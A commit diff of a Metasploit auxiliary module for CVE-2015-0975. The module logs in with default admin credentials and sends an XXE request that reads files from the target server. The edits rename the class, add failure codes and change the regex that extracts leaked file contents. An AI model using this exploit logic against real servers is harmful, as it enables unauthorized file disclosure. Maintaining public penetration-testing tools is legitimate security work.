1
1
require 'msf/core'
2
2
require 'openssl'
3
3
4
- class Metasploit3 < Msf ::Auxiliary
4
+ class Metasploit4 < Msf ::Auxiliary
5
5
6
6
include Msf ::Exploit ::Remote ::HttpClient
7
7
@@ -23,13 +23,11 @@ def initialize(info = {})
23
23
admin password of "admin" for security purposes.
24
24
} ,
25
25
'License' => MSF_LICENSE ,
26
- 'Author' =>
27
- [
26
+ 'Author' => [
28
27
'Stephen Breen <breenmachine[at]gmail.com>' , # discovery
29
28
'Justin Kennedy <jstnkndy[at]gmail.com>' , # metasploit module
30
29
] ,
31
- 'References' =>
32
- [
30
+ 'References' => [
33
31
[ 'CVE' , '2015-0975' ]
34
32
] ,
35
33
'DisclosureDate' => 'Jan 08 2015'
@@ -62,20 +60,20 @@ def run
62
60
} )
63
61
64
62
if res . nil?
65
- fail_with ( "No response from POST request" )
63
+ fail_with ( Failure :: Unreachable , "No response from POST request" )
66
64
elsif res . code != 302
67
- fail_with ( "Non-302 response from POST request" )
65
+ fail_with ( Failure :: UnexpectedReply , "Non-302 response from POST request" )
68
66
end
69
67
70
68
unless res . headers [ "Location" ] . include? "index.jsp"
71
- fail_with ( Failure ::Unknown , 'Authentication failed' )
69
+ fail_with ( Failure ::NoAccess , 'Authentication failed' )
72
70
end
73
71
74
72
cookie = res . get_cookies
75
73
76
74
print_status ( "Got cookie, going for the goods" )
77
75
78
- rand_doctype = Rex ::Text . rand_text_alpha ( rand ( 1 ..10 ) )
76
+ rand_doctype = Rex ::Text . rand_text_alpha ( rand ( 1 ..10 ) )
79
77
rand_entity1 = Rex ::Text . rand_text_alpha ( rand ( 1 ..10 ) )
80
78
rand_entity2 = Rex ::Text . rand_text_alpha ( rand ( 1 ..10 ) )
81
79
delimiter = SecureRandom . uuid
@@ -88,14 +86,13 @@ def run
88
86
89
87
res = send_request_raw ( {
90
88
'method' => 'POST' ,
91
- 'uri' => normalize_uri ( target_uri . path , 'rtc' , 'post/' ) ,
92
- 'data' => xxe ,
89
+ 'uri' => normalize_uri ( target_uri . path , 'rtc' , 'post/' ) ,
90
+ 'data' => xxe ,
93
91
'cookie' => cookie
94
92
} )
95
93
96
94
# extract filepath data from response
97
-
98
- if res and res . code == 400 and res . message =~ /#{ delimiter } (.+)#{ delimiter } /
95
+ if res && res . code == 400 && res . body =~ /title.+#{ delimiter } (.+)#{ delimiter } .+title/m
99
96
result = $1
100
97
print_good ( "#{ result } " )
101
98
else
0 commit comments